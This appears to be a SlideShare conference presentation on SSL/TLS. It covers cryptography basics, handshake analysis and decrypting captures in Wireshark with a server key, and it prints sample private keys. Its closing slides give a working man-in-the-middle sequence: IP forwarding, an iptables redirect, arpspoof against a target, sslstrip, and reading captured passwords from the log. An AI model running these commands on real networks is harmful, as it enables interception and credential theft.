SlideShare a Scribd company logo

Sniffing SSL Traffic

Download as PPT, PDF
D
dkaya

The document discusses analyzing SSL traffic and decrypting SSL connections. It provides an overview of cryptographic techniques used in SSL like symmetric and asymmetric encryption, hashing, digital signatures, and certificates. It then covers the SSL/TLS protocol structure, analyzing SSL handshakes and record layers, decrypting SSL using private keys, and tools like SSLstrip for man-in-the-middle attacks.

TechnologyEducation
1 of 59
Downloaded 232 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
Sniffing SSL Traffic
Challenges Confidentiality Encryption and Decryption Message Integrity Message Digest and Message Signing Endpoint Authentication & Nonrepudiation Certificates and Certificate Authorities SSL
Question ? Who… … troubleshooted SSL traffic before? … decrypted SSL traffic before? … and ran into problems decrypting? … knows the purpose of each handshake message? … troubleshooted client authentication problems?
Agenda Cryptology overview The SSL protocol Analyzing SSL Fun with SSLstrip Questions & Discussion
Agenda Cryptology overview The SSL protocol Analyzing SSL Fun with SSLstrip Questions & Discussion
Symmetric Encryption Same key for encryption and decryption Computatively "cheap" Short keys (typically 40-256 bits) DES, 3DES, AESxxx, RC4
Asymmetric Encryption One key for encryption, second key for decryption (both keys form a pair) Computatively "expensive" Long keys (typically 512-4096 bits) RSA, DSA
Hashing / Message Digest Irreversible original text not reproducible from the digest Collision-resistance "Not possible" to create a message M' so that it has the same digest as message M MD5, SHA-1, SHA-2 4fe7ad41
Message Signing Create digest of message Encrypt digest with private key Authenticity and sender of message can be checked with public key 4fe7ad41 3e7bc46a 4fe7ad41 4fe7ad41 3e7bc46a = ?
Digital Certificates "In cryptography, a public key certificate (or identity certificate) is an electronic document which utilizes a digital signature to bind together a public key with an identity." (From http://en.wikipedia.org/wiki/Digital_certificate) But who is signing???
Certificate Authorities Mutually trusted by sender and receiver "Solves" key exchange problems CA's can be chained Top of chain is "self-signed" (and is called the "Root CA")
Agenda Cryptology overview The SSL protocol Analyzing SSL Further reading & Links Questions & Discussion
SSL History SSLv1 by Netscape (unreleased, 1994) SSLv2 by Netscape ( v2-draft ,1994) SSLv3 by Netscape ( v3-draft , 1995) TLSv1.0, IETF ( RFC 2246 , 1999) TLSv1.1, IETF ( RFC 4346 , 2006) TLSv1.2, IETF ( RFC 5246 , 2008)
Place in TCP/IP stack Between transport and application layer Protocol independent IP TCP HTTP SMTP … SSL/TLS SSL record layer handshake change cipherspec application data alert
SSL Record Layer Provides fragmentation Multiple SSL messages (of one content type) per SSL Record allowed SSL Record can be split over multiple TCP-segments One TCP-segment can contain multiple SSL Records (or fragments)
SSL Content Types Handshake Protocol (0x16) responsible for authentication and key setup Change Cipher Spec Protocol (0x14) Notify start of encryption Alert Protocol (0x15) Reporting of warnings and fatal errors Application Protocol (0x17) Actual encryption and transport of data
Agenda Cryptology overview The SSL protocol Analyzing SSL Fun with SSLstrip Questions & Discussion
Choosing the right settings
Analyzing the SSL handshake Normal RSA handshake Ephemeral RSA (or DH) handshake SSL session with client authentication Reusing SSL sessions Reused SSL session (partial handshake) Expired SSL session No SSL reuse
Normal RSA handshake Client Server ServerHello ClientHello Certificate ServerHelloDone ClientKeyExchange ChangeCipherSpec Finished (encrypted) ChangeCipherSpec Finished (encrypted)
First packet…
Analyzing the SSL record layer (1)
Random
Session ID
Cipher Suites
Server name
Server Hello
Certificate Message
Server’s Certificate
Server Hello Done
Certificate Validation
Client Key Exchange
Finally Application Data
Ephemeral RSA (or DH) handshake Client Server ServerHello ClientHello Certificate ServerHelloDone ClientKeyExchange ChangeCipherSpec Finished (encrypted) ChangeCipherSpec Finished (encrypted) ServerKeyExchange
Server Key Exchange
Server Key Exchange
Client Authentication Client Server ServerHello ClientHello Certificate ServerHelloDone Certificate ClientKeyExchange Finished (encrypted) ChangeCipherSpec Finished (encrypted) CertificateRequest CertificateVerify ChangeCipherSpec
Client Certificate Request
Certificate Request
Certificate (C)
Certificate Verify
Caching SSL sessions Key negotiation "expensive" Cache SSL sessions between TCP sessions and continue where left off SSL session ID is used as Index Timeout on SSL session ID is an "absolute timeout" not an "idle timeout" Old IE: 2 minutes, now 10 hours
Handshake of a Reused Session Client Server ServerHello ClientHello ChangeCipherSpec Finished (encrypted) ChangeCipherSpec Finished (encrypted)
SSL session reuse (new, reused and expired) Full Handshake Partial Handshake
No SSL session caching
Analyzing SSL alerts Without decryption: With decryption:
Decrypting SSL traffic Provide server private key to Wireshark Only works when whole session (including full handshake) is in the tracefile Does not work with Ephemeral RSA or DH ciphers (ServerKeyExchange present) Also works with Client Authentication
Providing the server private key (1) tshark -r file.cap -o ssl.keys_list:192.168.3.3,443,http,"c:\key.pem" \ -o ssl.debug_file:"c:\ssl-debug.log" -V -R http ssl.keys_list: 192.168.3.3,443,http,c:\key.pem ssl.debug_file: c:\temp\ssl-debug.log Wireshark preferences file: When using Tshark:
Must be in PEM format without passphrase … or PKCS12 format (passphrase allowed) File is binary Providing the server private key (2) PEM keyfile *with* passphrase: -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: DES-EDE3-CBC,F6C218D4FA3C8B66 FR2cnmkkFHH45Dcsty1qDiIUy/uXn+9m/xeQMVRxtiSAmBmnUDUFIFCDDiDc9yif ERok2jPr2BzAazl5RBxS2TY/+7x0/dHD11sF3LnJUoNruo77TERxqgzOI0W1VDRA ... ygw5JslxgiN18F36E/cEP5rKvVYvfEPMa6IsiRhfZk1jLAuZihVWc7JodDf+6RKV yBXrK/bDtdEih+bOnYu+ZDvjAzVz9GhggCW4QHNboDpTxrrYPkj5Nw== -----END RSA PRIVATE KEY----- PEM keyfile *without* passphrase: -----BEGIN RSA PRIVATE KEY----- MIICXgIBAAKBgQDrHdbb+yGE6m6EZ03bXURpZCjch2H6g97ZAkJVGrjLZFfettBA EYa8vYYxWsf8KBpEZeksSCsDA9MnU2H6QDjzqdOnaSWfeXMAr4OsCOpauStpreq7 q1hk8iOqy+f4KijRrhWplh1QW1A8gtSIg137pyUhW+WsfwxKwmzjGIC1SwIDAQAB AoGBAMneA9U6KIxjb+JUg/99c7h9W6wEvTYHNTXjf6psWA+hpuQ82E65/ZJdszL6 ... b6QKMh16r5wd6smQ+CmhOEnqqyT5AIwwl2RIr9GbfIpTbtbRQw/EcQOCx9wFiEfo tGSsEFi72rHK+DpJqRI9AkEA72gdyXRgPfGOS3rfQ3DBcImBQvDSCBa4cuU1XJ1/ MO93a8v9Vj87/yDm4xsBDsoz2PyBepawHVlIvZ6jDD0aXw== -----END RSA PRIVATE KEY----- ssl_init keys string: 192.168.3.3,443,http,c:\temp\public.sharkfest.local.key ssl_init found host entry 192.168.3.3,443,http,c:\temp\public.sharkfest.local.key ssl_init addr '192.168.3.3' port '443' filename 'c:\temp\public.sharkfest.local.key' password(only for p12 file) '(null)' ssl_load_key: can't import pem data SSL debug log:
Converting keys root@mgmt# openssl rsa -in encrypted.key -out cleartext.key Enter pass phrase for encrypted.key: <passphrase> writing RSA key root@mgmt# root@mgmt# openssl pkcs12 -in pem.cert -inkey pem.key -export -out cert.pkcs12 Enter Export Password: <new-passphrase> Verifying - Enter Export Password: <new-passphrase> root@mgmt# root@mgmt# openssl rsa -inform DER -in der.key -out pem.key Enter pass phrase for encrypted.key: <passphrase> writing RSA key root@mgmt# Removing passphrase: Converting from DER to PEM (and removing passphrase): Converting from PEM to PKCS12 (and adding passphrase):
Decryption in Action
Agenda Cryptology overview The SSL protocol Analyzing SSL Fun with SSLstrip Questions & Discussion
Preparation of the proxy First we make sure that we are making routing and nat; deniz@pt1:~# cat /proc/sys/net/ipv4/ip_forward 0 deniz@pt1 :~# echo &quot;1&quot; > /proc/sys/net/ipv4/ip_forward deniz@pt1 :~# cat /proc/sys/net/ipv4/ip_forward 1 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Man in the middle starts We are sending spoofed arp addresses to default gateway and to the target machine; arpspoof –i eth0 –t 192.168.11.231 192.168.11.244
SSL Strip We are now starting SSL Strip proxy; ./sslstrip –l 8080
Screenshot from browser…
Here is the user and password from logs Tail –f sslstrip.log
Questions & Discussion ? ? ? ? ? ? ? ? ? ? ? ? ? ?
Thank you…

More Related Content

PPTX
Introduction to SSL and How to Exploit & Secure
Brian Ritchie
 
PPTX
SSL/TLS 101
Chul-Woong Yang
 
PPTX
SSL overview
Todd Benson (I.T. SPECIALIST and I.T. SECURITY)
 
PPTX
Ssl in a nutshell
Frank Kelly
 
PPT
Ssl (Secure Sockets Layer)
Asad Ali
 
PDF
SSL intro
Three Lee
 
PPT
SSL
theekuchi
 
PDF
TLS/SSL Internet Security Talk
Nisheed KM
 
Introduction to SSL and How to Exploit & Secure
Brian Ritchie
 
SSL/TLS 101
Chul-Woong Yang
 
SSL overview
Todd Benson (I.T. SPECIALIST and I.T. SECURITY)
 
Ssl in a nutshell
Frank Kelly
 
Ssl (Secure Sockets Layer)
Asad Ali
 
SSL intro
Three Lee
 
SSL
theekuchi
 
TLS/SSL Internet Security Talk
Nisheed KM
 

What's hot (20)

PDF
TLS/SSL Protocol Design
Nate Lawson
 
PPT
SSL Secure Socket Layer
omkar bhagat
 
PPTX
SSL/TLS Introduction with Practical Examples Including Wireshark Captures
JaroslavChmurny
 
PPTX
secure socket layer
Amar Shah
 
PPTX
Transport layer security
Hrudya Balachandran
 
PPTX
Securing TCP connections using SSL
Sagar Mali
 
PPT
Introduction to Secure Sockets Layer
Nascenia IT
 
PDF
Basics of ssl
n|u - The Open Security Community
 
PDF
SSL Secure socket layer
Ahmed Elnaggar
 
PPSX
Secure socket layer
Nishant Pahad
 
PPTX
SSL And TLS
Ghanshyam Patel
 
PPTX
Secure Socket Layer (SSL)
Samip jain
 
PPT
Secure Socket Layer (SSL)
amanchaurasia
 
PPTX
SSL Layer
Trinh Phuc Tho
 
PDF
SSl/TLS Analysis
Duduman Bogdan Vlad
 
PPT
SSL/TLS
Dr Anjan Krishnamurthy
 
PDF
SSL/TLS
pavansmiles
 
PPTX
All you need to know about transport layer security
Maarten Smeets
 
PPT
SSL
Duy Do Phan
 
PPTX
Introduction to SSL/TLS
keithrozario
 
TLS/SSL Protocol Design
Nate Lawson
 
SSL Secure Socket Layer
omkar bhagat
 
SSL/TLS Introduction with Practical Examples Including Wireshark Captures
JaroslavChmurny
 
secure socket layer
Amar Shah
 
Transport layer security
Hrudya Balachandran
 
Securing TCP connections using SSL
Sagar Mali
 
Introduction to Secure Sockets Layer
Nascenia IT
 
Basics of ssl
n|u - The Open Security Community
 
SSL Secure socket layer
Ahmed Elnaggar
 
Secure socket layer
Nishant Pahad
 
SSL And TLS
Ghanshyam Patel
 
Secure Socket Layer (SSL)
Samip jain
 
Secure Socket Layer (SSL)
amanchaurasia
 
SSL Layer
Trinh Phuc Tho
 
SSl/TLS Analysis
Duduman Bogdan Vlad
 
SSL/TLS
Dr Anjan Krishnamurthy
 
SSL/TLS
pavansmiles
 
All you need to know about transport layer security
Maarten Smeets
 
SSL
Duy Do Phan
 
Introduction to SSL/TLS
keithrozario
 
Ad

Viewers also liked (20)

PPT
Intrusion Discovery on Windows
dkaya
 
PPT
Hacking Cisco Networks and Countermeasures
dkaya
 
PPT
Mitigating Layer2 Attacks
dkaya
 
PPT
Cisco Switch Security
dkaya
 
PPTX
SAS
jgmatheson
 
PPTX
Cryptography.
sangavisankar
 
PPTX
Mitigating worm attacks
dkaya
 
PPTX
Ip security
Naveen Dubey
 
PDF
Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.
Sumutiu Marius
 
PPTX
Mastering checkpoint-1-basic-installation
networkershome
 
PPTX
Data Encryption Standard (DES)
Haris Ahmed
 
PPTX
Microsoft Days 09 Windows 2008 Security
dkaya
 
PPTX
Firewall, Trusted Systems,IP Security ,ESP Encryption and Authentication
Gopal Sakarkar
 
PPTX
Data encryption standard
Mohammad Golyani
 
PPT
Understanding and Troubleshooting ASA NAT
Cisco Russia
 
PPT
Implementing Cisco AAA
dkaya
 
PDF
Web Security Deployment
Cisco Canada
 
PDF
Avaya Networking Solution Overview
Motty Ben Atia
 
PPT
Implementing 802.1x Authentication
dkaya
 
PPTX
Checkpoint r77
Minh Dương
 
Intrusion Discovery on Windows
dkaya
 
Hacking Cisco Networks and Countermeasures
dkaya
 
Mitigating Layer2 Attacks
dkaya
 
Cisco Switch Security
dkaya
 
SAS
jgmatheson
 
Cryptography.
sangavisankar
 
Mitigating worm attacks
dkaya
 
Ip security
Naveen Dubey
 
Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.
Sumutiu Marius
 
Mastering checkpoint-1-basic-installation
networkershome
 
Data Encryption Standard (DES)
Haris Ahmed
 
Microsoft Days 09 Windows 2008 Security
dkaya
 
Firewall, Trusted Systems,IP Security ,ESP Encryption and Authentication
Gopal Sakarkar
 
Data encryption standard
Mohammad Golyani
 
Understanding and Troubleshooting ASA NAT
Cisco Russia
 
Implementing Cisco AAA
dkaya
 
Web Security Deployment
Cisco Canada
 
Avaya Networking Solution Overview
Motty Ben Atia
 
Implementing 802.1x Authentication
dkaya
 
Checkpoint r77
Minh Dương
 
Ad

Similar to Sniffing SSL Traffic (20)

PPT
8.SSL encryption.ppt
NoName261177
 
PDF
TLS Perf: from three to zero in one spec
Natasha Rooney
 
PPTX
Atonomy of-a-tls-handshake-mini-conferentie
Michel Schudel
 
PPT
Transportsec
Bogdan Korniyenko
 
PDF
TLS/SSL Protocol Design 201006
Nate Lawson
 
PPTX
Cryptography by Afroz haider mir
AFROZ MIR
 
PPT
tls security fda fkj k kjkfjsdkl jkjfsdk.ppt
sandhyadevit
 
PPT
Transport layer security.ppt
ImXaib
 
PDF
SSL/TLS Handshake
Arpit Agarwal
 
PPT
ch16-Cryptography and Network Security.ppt
KamranHussainAwan
 
PPTX
Transport Layer Security
Huda Seyam
 
PDF
Wireshark lab ssl v7 solution
United International University
 
PPT
SSL.ppt
TXCDHRUV
 
DOCX
SSL-image
Rajat Toshniwal
 
PPT
cryptography and network security thid.ppt
ubaidullah75790
 
PDF
CRYPTOGRAPHY AND NETWORK SECURITY- Transport-level Security
Jyothishmathi Institute of Technology and Science Karimnagar
 
PDF
Computer network (4)
NYversity
 
PPTX
Ssl
Anandraj Kulkarni
 
PDF
Overview of SSL & TLS Client-Server Interactions
Katie Knowles
 
PPT
What is SSL ? The Secure Sockets Layer (SSL) Protocol
Mohammed Adam
 
8.SSL encryption.ppt
NoName261177
 
TLS Perf: from three to zero in one spec
Natasha Rooney
 
Atonomy of-a-tls-handshake-mini-conferentie
Michel Schudel
 
Transportsec
Bogdan Korniyenko
 
TLS/SSL Protocol Design 201006
Nate Lawson
 
Cryptography by Afroz haider mir
AFROZ MIR
 
tls security fda fkj k kjkfjsdkl jkjfsdk.ppt
sandhyadevit
 
Transport layer security.ppt
ImXaib
 
SSL/TLS Handshake
Arpit Agarwal
 
ch16-Cryptography and Network Security.ppt
KamranHussainAwan
 
Transport Layer Security
Huda Seyam
 
Wireshark lab ssl v7 solution
United International University
 
SSL.ppt
TXCDHRUV
 
SSL-image
Rajat Toshniwal
 
cryptography and network security thid.ppt
ubaidullah75790
 
CRYPTOGRAPHY AND NETWORK SECURITY- Transport-level Security
Jyothishmathi Institute of Technology and Science Karimnagar
 
Computer network (4)
NYversity
 
Ssl
Anandraj Kulkarni
 
Overview of SSL & TLS Client-Server Interactions
Katie Knowles
 
What is SSL ? The Secure Sockets Layer (SSL) Protocol
Mohammed Adam
 

Recently uploaded (20)

PDF
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
PPT
Teaching material agriculture food technology
LiaRayya
 
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
PDF
Encapsulation theory and applications.pdf
gurumoop
 
PPTX
PA Analog/Digital System: The Backbone of Modern Surveillance and Communication
AVTRON Technologies LLC
 
PDF
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
IAESIJAI
 
PDF
KodekX | Application Modernization Development
KodekX
 
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
PDF
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
PDF
NewMind AI Monthly Chronicles - July 2025
NewMind AI
 
PDF
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
PDF
NewMind AI Weekly Chronicles - August'25 Week I
NewMind AI
 
PDF
Network Security Unit 5.pdf for BCA BBA.
Serpent6
 
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
PPTX
Understanding_Digital_Forensics_Presentation.pptx
ImranKhan423233
 
PDF
CIFDAQ's Market Insight: SEC Turns Pro Crypto
CIFDAQ
 
PPTX
Cloud computing and distributed systems.
kkkkkhan
 
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
Teaching material agriculture food technology
LiaRayya
 
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
Encapsulation theory and applications.pdf
gurumoop
 
PA Analog/Digital System: The Backbone of Modern Surveillance and Communication
AVTRON Technologies LLC
 
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
IAESIJAI
 
KodekX | Application Modernization Development
KodekX
 
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
NewMind AI Monthly Chronicles - July 2025
NewMind AI
 
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
NewMind AI Weekly Chronicles - August'25 Week I
NewMind AI
 
Network Security Unit 5.pdf for BCA BBA.
Serpent6
 
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
Understanding_Digital_Forensics_Presentation.pptx
ImranKhan423233
 
CIFDAQ's Market Insight: SEC Turns Pro Crypto
CIFDAQ
 
Cloud computing and distributed systems.
kkkkkhan
 

Sniffing SSL Traffic

  • 2. Challenges Confidentiality Encryption and Decryption Message Integrity Message Digest and Message Signing Endpoint Authentication & Nonrepudiation Certificates and Certificate Authorities SSL
  • 3. Question ? Who… … troubleshooted SSL traffic before? … decrypted SSL traffic before? … and ran into problems decrypting? … knows the purpose of each handshake message? … troubleshooted client authentication problems?
  • 4. Agenda Cryptology overview The SSL protocol Analyzing SSL Fun with SSLstrip Questions & Discussion
  • 5. Agenda Cryptology overview The SSL protocol Analyzing SSL Fun with SSLstrip Questions & Discussion
  • 6. Symmetric Encryption Same key for encryption and decryption Computatively &quot;cheap&quot; Short keys (typically 40-256 bits) DES, 3DES, AESxxx, RC4
  • 7. Asymmetric Encryption One key for encryption, second key for decryption (both keys form a pair) Computatively &quot;expensive&quot; Long keys (typically 512-4096 bits) RSA, DSA
  • 8. Hashing / Message Digest Irreversible original text not reproducible from the digest Collision-resistance &quot;Not possible&quot; to create a message M' so that it has the same digest as message M MD5, SHA-1, SHA-2 4fe7ad41
  • 9. Message Signing Create digest of message Encrypt digest with private key Authenticity and sender of message can be checked with public key 4fe7ad41 3e7bc46a 4fe7ad41 4fe7ad41 3e7bc46a = ?
  • 10. Digital Certificates &quot;In cryptography, a public key certificate (or identity certificate) is an electronic document which utilizes a digital signature to bind together a public key with an identity.&quot; (From http://en.wikipedia.org/wiki/Digital_certificate) But who is signing???
  • 11. Certificate Authorities Mutually trusted by sender and receiver &quot;Solves&quot; key exchange problems CA's can be chained Top of chain is &quot;self-signed&quot; (and is called the &quot;Root CA&quot;)
  • 12. Agenda Cryptology overview The SSL protocol Analyzing SSL Further reading & Links Questions & Discussion
  • 13. SSL History SSLv1 by Netscape (unreleased, 1994) SSLv2 by Netscape ( v2-draft ,1994) SSLv3 by Netscape ( v3-draft , 1995) TLSv1.0, IETF ( RFC 2246 , 1999) TLSv1.1, IETF ( RFC 4346 , 2006) TLSv1.2, IETF ( RFC 5246 , 2008)
  • 14. Place in TCP/IP stack Between transport and application layer Protocol independent IP TCP HTTP SMTP … SSL/TLS SSL record layer handshake change cipherspec application data alert
  • 15. SSL Record Layer Provides fragmentation Multiple SSL messages (of one content type) per SSL Record allowed SSL Record can be split over multiple TCP-segments One TCP-segment can contain multiple SSL Records (or fragments)
  • 16. SSL Content Types Handshake Protocol (0x16) responsible for authentication and key setup Change Cipher Spec Protocol (0x14) Notify start of encryption Alert Protocol (0x15) Reporting of warnings and fatal errors Application Protocol (0x17) Actual encryption and transport of data
  • 17. Agenda Cryptology overview The SSL protocol Analyzing SSL Fun with SSLstrip Questions & Discussion
  • 18. Choosing the right settings
  • 19. Analyzing the SSL handshake Normal RSA handshake Ephemeral RSA (or DH) handshake SSL session with client authentication Reusing SSL sessions Reused SSL session (partial handshake) Expired SSL session No SSL reuse
  • 20. Normal RSA handshake Client Server ServerHello ClientHello Certificate ServerHelloDone ClientKeyExchange ChangeCipherSpec Finished (encrypted) ChangeCipherSpec Finished (encrypted)
  • 22. Analyzing the SSL record layer (1)
  • 34. Ephemeral RSA (or DH) handshake Client Server ServerHello ClientHello Certificate ServerHelloDone ClientKeyExchange ChangeCipherSpec Finished (encrypted) ChangeCipherSpec Finished (encrypted) ServerKeyExchange
  • 37. Client Authentication Client Server ServerHello ClientHello Certificate ServerHelloDone Certificate ClientKeyExchange Finished (encrypted) ChangeCipherSpec Finished (encrypted) CertificateRequest CertificateVerify ChangeCipherSpec
  • 42. Caching SSL sessions Key negotiation &quot;expensive&quot; Cache SSL sessions between TCP sessions and continue where left off SSL session ID is used as Index Timeout on SSL session ID is an &quot;absolute timeout&quot; not an &quot;idle timeout&quot; Old IE: 2 minutes, now 10 hours
  • 43. Handshake of a Reused Session Client Server ServerHello ClientHello ChangeCipherSpec Finished (encrypted) ChangeCipherSpec Finished (encrypted)
  • 44. SSL session reuse (new, reused and expired) Full Handshake Partial Handshake
  • 45. No SSL session caching
  • 46. Analyzing SSL alerts Without decryption: With decryption:
  • 47. Decrypting SSL traffic Provide server private key to Wireshark Only works when whole session (including full handshake) is in the tracefile Does not work with Ephemeral RSA or DH ciphers (ServerKeyExchange present) Also works with Client Authentication
  • 48. Providing the server private key (1) tshark -r file.cap -o ssl.keys_list:192.168.3.3,443,http,&quot;c:\key.pem&quot; \ -o ssl.debug_file:&quot;c:\ssl-debug.log&quot; -V -R http ssl.keys_list: 192.168.3.3,443,http,c:\key.pem ssl.debug_file: c:\temp\ssl-debug.log Wireshark preferences file: When using Tshark:
  • 49. Must be in PEM format without passphrase … or PKCS12 format (passphrase allowed) File is binary Providing the server private key (2) PEM keyfile *with* passphrase: -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: DES-EDE3-CBC,F6C218D4FA3C8B66 FR2cnmkkFHH45Dcsty1qDiIUy/uXn+9m/xeQMVRxtiSAmBmnUDUFIFCDDiDc9yif ERok2jPr2BzAazl5RBxS2TY/+7x0/dHD11sF3LnJUoNruo77TERxqgzOI0W1VDRA ... ygw5JslxgiN18F36E/cEP5rKvVYvfEPMa6IsiRhfZk1jLAuZihVWc7JodDf+6RKV yBXrK/bDtdEih+bOnYu+ZDvjAzVz9GhggCW4QHNboDpTxrrYPkj5Nw== -----END RSA PRIVATE KEY----- PEM keyfile *without* passphrase: -----BEGIN RSA PRIVATE KEY----- MIICXgIBAAKBgQDrHdbb+yGE6m6EZ03bXURpZCjch2H6g97ZAkJVGrjLZFfettBA EYa8vYYxWsf8KBpEZeksSCsDA9MnU2H6QDjzqdOnaSWfeXMAr4OsCOpauStpreq7 q1hk8iOqy+f4KijRrhWplh1QW1A8gtSIg137pyUhW+WsfwxKwmzjGIC1SwIDAQAB AoGBAMneA9U6KIxjb+JUg/99c7h9W6wEvTYHNTXjf6psWA+hpuQ82E65/ZJdszL6 ... b6QKMh16r5wd6smQ+CmhOEnqqyT5AIwwl2RIr9GbfIpTbtbRQw/EcQOCx9wFiEfo tGSsEFi72rHK+DpJqRI9AkEA72gdyXRgPfGOS3rfQ3DBcImBQvDSCBa4cuU1XJ1/ MO93a8v9Vj87/yDm4xsBDsoz2PyBepawHVlIvZ6jDD0aXw== -----END RSA PRIVATE KEY----- ssl_init keys string: 192.168.3.3,443,http,c:\temp\public.sharkfest.local.key ssl_init found host entry 192.168.3.3,443,http,c:\temp\public.sharkfest.local.key ssl_init addr '192.168.3.3' port '443' filename 'c:\temp\public.sharkfest.local.key' password(only for p12 file) '(null)' ssl_load_key: can't import pem data SSL debug log:
  • 50. Converting keys root@mgmt# openssl rsa -in encrypted.key -out cleartext.key Enter pass phrase for encrypted.key: <passphrase> writing RSA key root@mgmt# root@mgmt# openssl pkcs12 -in pem.cert -inkey pem.key -export -out cert.pkcs12 Enter Export Password: <new-passphrase> Verifying - Enter Export Password: <new-passphrase> root@mgmt# root@mgmt# openssl rsa -inform DER -in der.key -out pem.key Enter pass phrase for encrypted.key: <passphrase> writing RSA key root@mgmt# Removing passphrase: Converting from DER to PEM (and removing passphrase): Converting from PEM to PKCS12 (and adding passphrase):
  • 52. Agenda Cryptology overview The SSL protocol Analyzing SSL Fun with SSLstrip Questions & Discussion
  • 53. Preparation of the proxy First we make sure that we are making routing and nat; deniz@pt1:~# cat /proc/sys/net/ipv4/ip_forward 0 deniz@pt1 :~# echo &quot;1&quot; > /proc/sys/net/ipv4/ip_forward deniz@pt1 :~# cat /proc/sys/net/ipv4/ip_forward 1 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
  • 54. Man in the middle starts We are sending spoofed arp addresses to default gateway and to the target machine; arpspoof –i eth0 –t 192.168.11.231 192.168.11.244
  • 55. SSL Strip We are now starting SSL Strip proxy; ./sslstrip –l 8080
  • 57. Here is the user and password from logs Tail –f sslstrip.log
  • 58. Questions & Discussion ? ? ? ? ? ? ? ? ? ? ? ? ? ?

Editor's Notes

  • #7: Mostly used for bulk encryption How to exchange keys?
  • #8: public-private key Mostly used for secure key exchanges How to verify keys?